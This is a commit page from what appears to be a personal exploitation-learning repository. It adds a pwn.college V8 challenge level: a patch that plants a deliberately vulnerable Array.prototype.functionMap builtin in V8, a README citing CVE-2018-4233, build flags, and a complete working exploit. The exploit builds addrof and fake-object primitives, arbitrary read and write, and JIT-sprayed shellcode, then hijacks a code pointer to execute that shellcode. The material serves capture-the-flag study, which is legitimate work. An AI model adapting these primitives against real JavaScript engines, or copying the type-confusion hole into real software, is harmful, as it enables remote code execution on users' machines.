bjrjk/pwn-learning
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Moved JavaScript/PwnCollegeV8Exploitation/ to PwnCollege/V8Exploitation/

Browse Source
This commit is contained in:
Jack Ren
2024-09-27 10:32:08 +08:00
parent ed5918f284
commit 41c959a465
52 changed files with 1 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

132
PwnCollege/V8Exploitation/Level6/Exploit.js Normal file
View File

@@ -0,0 +1,132 @@
// Integrated Builtin:
// - Array.prototype.functionMap(func)
let ab = new ArrayBuffer(8);
let f64a = new Float64Array(ab, 0, 1);
let i32a = new Uint32Array(ab, 0, 2);
let si32a = new Int32Array(ab, 0, 2);
let bi64a = new BigUint64Array(ab, 0, 1);
function c2f(low, high) { // combined (two 4 bytes) word to float
i32a[0] = low;
i32a[1] = high;
return f64a[0];
}
function b2f(v) { // bigint to float
bi64a[0] = v;
return f64a[0];
}
function f2b(v) { // float to bigint
f64a[0] = v;
return bi64a[0];
}
function unptr(v) {
return v & 0xfffffffe;
}
function ptr(v) {
return v | 1;
}
function shellcode() { // Promote to ensure not GC during training
// JIT spray machine code form of `execve("catflag", NULL, NULL)`
return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
}
for (let i = 0; i < 1000; i++) shellcode(); // Trigger MAGLEV compilation
const HeapNumber_map = 0x0000_0809;
function GetAddressOf(obj) {
let arr = [9.88850038820051489803925001713E-311, 9.88850038820051489803925001713E-311, 9.88850038820051489803925001713E-311];
let i = 0;
let addr = undefined;
try {
arr.functionMap((value) => {
switch (i) {
case 0: {
arr[2] = obj;
i++;
return value;
}
case 1: {
f64a[0] = value;
addr = i32a[0];
return {};
}
}
});
} catch (e) {}
return unptr(addr);
}
function GetFakeObject(addr) {
let arr = [c2f(ptr(addr), HeapNumber_map)];
arr.functionMap((value) => {
arr[0] = {};
return value;
});
return arr[0];
}
// Create a PACKED_DOUBLE_ELEMENTS array contains faked PACKED_DOUBLE_ELEMENTS array
// map, properties, elements, length --- first three field are static roots
var arr = [c2f(0x001cb821, 0x00000725), c2f(0x00000725, 0x00008000)];
// %DebugPrint(arr);
// %SystemBreak();
var arr_addr = GetAddressOf(arr);
console.log("Address of arr: " + arr_addr.toString(16));
var fakearr = GetFakeObject(arr_addr + 0x54); // Heap Fengshui
// %DebugPrint(fakearr);
// %SystemBreak();
// QWORD Aligned
function ArbRead64(cage_addr) { // int32
if (cage_addr & 0x7) throw new Error("Must QWORD Aligned");
arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000);
let result = f2b(fakearr[0]);
console.log(`ArbRead64 ${cage_addr.toString(16)}: ${result.toString(16)}`);
return result;
}
// QWORD Aligned
function ArbWrite64(cage_addr, value) { // int32, bigint
if (cage_addr & 0x7) throw new Error("Must QWORD Aligned");
arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000);
let written = b2f(value);
fakearr[0] = written;
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
}
// DWORD Aligned
function ArbRead32(cage_addr) { // int32 -> int32
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
let result = i32a[(cage_addr & 0x4) >> 2];
console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
return result;
}
// DWORD Aligned
function ArbWrite32(cage_addr, value) { // int32, int32 -> void
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
i32a[(cage_addr & 0x4) >> 2] = value;
ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
}
let shellcode_addr = GetAddressOf(shellcode);
console.log("Address of shellcode: " + shellcode_addr.toString(16));
// %DebugPrint(shellcode);
// %SystemBreak();
let code_addr = unptr(ArbRead32(shellcode_addr + 0xC));
console.log("Address of code: " + code_addr.toString(16));
let instruction_start_addr = code_addr + 0x14;
let instruction_start = ArbRead32(instruction_start_addr);
console.log("instruction_start: " + instruction_start.toString(16));
ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
shellcode();

23
PwnCollege/V8Exploitation/Level6/README.md Normal file
View File

@@ -0,0 +1,23 @@
# Level 6
## Problem
Given a vulnerable builtin `Array.prototype.functionMap(func)`:
- It takes a `PACKED_DOUBLE_ELEMENTS` JSArray receiver and a JSFunction argument.
- **reinterpret_cast** `elements` to a `FixedDoubleArray`, then for each element `e`:
- Trigger a custom JavaScript callback `func`, with
- Input: this double element `e`
- Output: any double element `o`
- And store `o` to `e`'s original position.
## Key Knowledge
- Side Effect based Array Element Type Confusion
- CVE-2018-4233
- [saelo/cve-2018-4233: Exploit for CVE-2018-4233, a WebKit JIT optimization bug used during Pwn2Own 2018](https://github.com/saelo/cve-2018-4233)
- [Attacking Client-Side JIT Compilers (v2)](https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf#page=106)
- [Pwn2Own 2018 CVE-2018-4233 分析](https://www.anquanke.com/post/id/244472)
- Use this technique to construct Address Of & Fake Object primitive.
- How to build d8 and debug them?
- [Building V8 from source](https://v8.dev/docs/build)
- [Building V8 with GN](https://v8.dev/docs/build-gn)

1
PwnCollege/V8Exploitation/Level6/REVISION Normal file
View File

@@ -0,0 +1 @@
5a2307d0f2c5b650c6858e2b9b57b335a59946ff

10
PwnCollege/V8Exploitation/Level6/args.gn Normal file
View File

@@ -0,0 +1,10 @@
is_component_build = false
is_debug = false
target_cpu = "x64"
v8_enable_sandbox = false
v8_enable_backtrace = true
v8_enable_disassembler = true
v8_enable_object_print = true
dcheck_always_on = false
use_goma = false
v8_code_pointer_sandboxing = false

134
PwnCollege/V8Exploitation/Level6/patch Normal file
View File

@@ -0,0 +1,134 @@
diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
index ea45a7ada6b..d450412f3e6 100644
--- a/src/builtins/builtins-array.cc
+++ b/src/builtins/builtins-array.cc
@@ -407,6 +407,53 @@ BUILTIN(ArrayPush) {
return *isolate->factory()->NewNumberFromUint((new_length));
}
+BUILTIN(ArrayFunctionMap) {
+ HandleScope scope(isolate);
+ Factory *factory = isolate->factory();
+ Handle<Object> receiver = args.receiver();
+
+ if (!IsJSArray(*receiver) || !HasOnlySimpleReceiverElements(isolate, Cast<JSArray>(*receiver))) {
+ THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+ factory->NewStringFromAsciiChecked("Nope")));
+ }
+
+ Handle<JSArray> array = Cast<JSArray>(receiver);
+
+ ElementsKind kind = array->GetElementsKind();
+
+ if (kind != PACKED_DOUBLE_ELEMENTS) {
+ THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+ factory->NewStringFromAsciiChecked("Need an array of double numbers")));
+ }
+
+ if (args.length() != 2) {
+ THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+ factory->NewStringFromAsciiChecked("Need exactly one argument")));
+ }
+
+ uint32_t len = static_cast<uint32_t>(Object::NumberValue(array->length()));
+
+ Handle<Object> func_obj = args.at(1);
+ if (!IsJSFunction(*func_obj)) {
+ THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+ factory->NewStringFromAsciiChecked("The argument must be a function")));
+ }
+
+ for (uint32_t i = 0; i < len; i++) {
+ double elem = Cast<FixedDoubleArray>(array->elements())->get_scalar(i);
+ Handle<Object> elem_handle = factory->NewHeapNumber(elem);
+ Handle<Object> result = Execution::Call(isolate, func_obj, array, 1, &elem_handle).ToHandleChecked();
+ if (!IsNumber(*result)) {
+ THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+ factory->NewStringFromAsciiChecked("The function must return a number")));
+ }
+ double result_value = static_cast<double>(Object::NumberValue(*result));
+ Cast<FixedDoubleArray>(array->elements())->set(i, result_value);
+ }
+
+ return ReadOnlyRoots(isolate).undefined_value();
+}
+
namespace {
V8_WARN_UNUSED_RESULT Tagged<Object> GenericArrayPop(Isolate* isolate,
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
index 78cbf8874ed..ede2775903e 100644
--- a/src/builtins/builtins-definitions.h
+++ b/src/builtins/builtins-definitions.h
@@ -394,6 +394,7 @@ namespace internal {
ArraySingleArgumentConstructor) \
TFC(ArrayNArgumentsConstructor, ArrayNArgumentsConstructor) \
CPP(ArrayConcat) \
+ CPP(ArrayFunctionMap) \
/* ES6 #sec-array.prototype.fill */ \
CPP(ArrayPrototypeFill) \
/* ES7 #sec-array.prototype.includes */ \
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
index 9a346d134b9..33cf2d2edad 100644
--- a/src/compiler/typer.cc
+++ b/src/compiler/typer.cc
@@ -1937,6 +1937,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
return Type::Receiver();
case Builtin::kArrayUnshift:
return t->cache_->kPositiveSafeInteger;
+ case Builtin::kArrayFunctionMap:
+ return Type::Receiver();
// ArrayBuffer functions.
case Builtin::kArrayBufferIsView:
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index facf0d86d79..382c015bc48 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -3364,7 +3364,7 @@ Local<FunctionTemplate> Shell::CreateNodeTemplates(
Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
- global_template->Set(Symbol::GetToStringTag(isolate),
+/* global_template->Set(Symbol::GetToStringTag(isolate),
String::NewFromUtf8Literal(isolate, "global"));
global_template->Set(isolate, "version",
FunctionTemplate::New(isolate, Version));
@@ -3385,13 +3385,13 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
global_template->Set(isolate, "readline",
FunctionTemplate::New(isolate, ReadLine));
global_template->Set(isolate, "load",
- FunctionTemplate::New(isolate, ExecuteFile));
+ FunctionTemplate::New(isolate, ExecuteFile));*/
global_template->Set(isolate, "setTimeout",
FunctionTemplate::New(isolate, SetTimeout));
// Some Emscripten-generated code tries to call 'quit', which in turn would
// call C's exit(). This would lead to memory leaks, because there is no way
// we can terminate cleanly then, so we need a way to hide 'quit'.
- if (!options.omit_quit) {
+/* if (!options.omit_quit) {
global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
}
global_template->Set(isolate, "testRunner",
@@ -3410,7 +3410,7 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
if (i::v8_flags.expose_async_hooks) {
global_template->Set(isolate, "async_hooks",
Shell::CreateAsyncHookTemplate(isolate));
- }
+ }*/
return global_template;
}
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
index 48249695b7b..5e76e66bc15 100644
--- a/src/init/bootstrapper.cc
+++ b/src/init/bootstrapper.cc
@@ -2533,6 +2533,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
SimpleInstallFunction(isolate_, proto, "at", Builtin::kArrayPrototypeAt, 1,
true);
+ SimpleInstallFunction(isolate_, proto, "functionMap",
+ Builtin::kArrayFunctionMap, 1, false);
SimpleInstallFunction(isolate_, proto, "concat",
Builtin::kArrayPrototypeConcat, 1, false);
SimpleInstallFunction(isolate_, proto, "copyWithin",